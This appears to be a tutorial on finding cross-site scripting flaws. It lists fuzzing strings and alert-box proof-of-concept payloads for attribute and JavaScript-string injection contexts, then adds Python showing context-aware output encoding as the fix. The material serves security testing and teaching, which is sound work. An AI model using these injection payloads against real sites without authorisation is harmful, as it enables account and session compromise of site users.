Collections of XSS payloads ready for fuzzing already exist:
XSS Discovery
Fuzzing
• Reflection tests: Simple but unique strings to determine if input is reflected back: 42424242
• Filter tests: Determine what characters get filtered or encoded:
<>()='"/;[]{}$--#&//
• PoC payloads: These payloads attempt to prove the XSS flaw exists:
<script>alert(42);</script>
In Tag Attributes
Input: 424242
Initial HTML:
<input type="text" name="xss" value="424242">
Context Considerations:
• Prefix options: close the value assignment with " and, if needed, close the tag itself with ">
• Suffix depends on whether additional tags are injected
Example Payload – Event Injection:
424242" onload="alert(42)
Resultant HTML:
<input type="text" name="xss" value="424242" onload="alert(42)">
In Existing JS Code
Input: 424242
Initial HTML:
<script>var HitchHiker="424242"; … </script>
Context Considerations:
• Suffix options include the JS statement terminator, ;, and the single-line comment delimiter, //
• The input will often sit inside a JS function call, so a closing parenthesis, ), might also be needed
Example Payload:
42";alert(42);//
Resultant HTML:
<script>var HitchHiker="42";alert(42);//"; … </script>
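To show why the two contexts above need different output encoding, here is an added example (not from the original page) that renders the page's two payloads into constructed templates mirroring the attribute and JS-string contexts, first with raw interpolation and then with context-aware encoding; the template strings, function names and the `js_string_encode` routine are assumptions for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed templates that mirror the page's two contexts (assumed, not a real app).
ATTR_TEMPLATE = '<input type="text" name="xss" value="{}">'
JS_TEMPLATE = '<script>var HitchHiker="{}"; </script>'

# The two example payloads from the page.
ATTR_PAYLOAD = '424242" onload="alert(42)'
JS_PAYLOAD = '42";alert(42);//'


def render_attr_unsafe(value: str) -> str:
    """Raw interpolation into an attribute value: reproduces the page's 'Resultant HTML'."""
    return ATTR_TEMPLATE.format(value)


def render_attr_safe(value: str) -> str:
    """Attribute context: HTML-encode the value, including both quote characters,
    so the injected " cannot end the value assignment."""
    return ATTR_TEMPLATE.format(html.escape(value, quote=True))


def render_js_unsafe(value: str) -> str:
    """Raw interpolation into a JS string literal: reproduces the page's 'Resultant HTML'."""
    return JS_TEMPLATE.format(value)


def js_string_encode(value: str) -> str:
    """JS string-literal context: encode every non-alphanumeric character as \\xHH or \\uHHHH,
    so neither the quote, the ; terminator, the // comment nor a </script> can escape the literal."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


def render_js_safe(value: str) -> str:
    return JS_TEMPLATE.format(js_string_encode(value))


class _InputAttrs(HTMLParser):
    """Collects the attributes the browser-side parser would see on the <input> element."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def input_attributes(rendered: str) -> dict:
    parser = _InputAttrs()
    parser.feed(rendered)
    return parser.attrs
```

With raw interpolation the parser reports a separate `onload` attribute; with encoding the whole payload stays inside `value`, and the JS variant contains no quote, semicolon or slash that could terminate the literal.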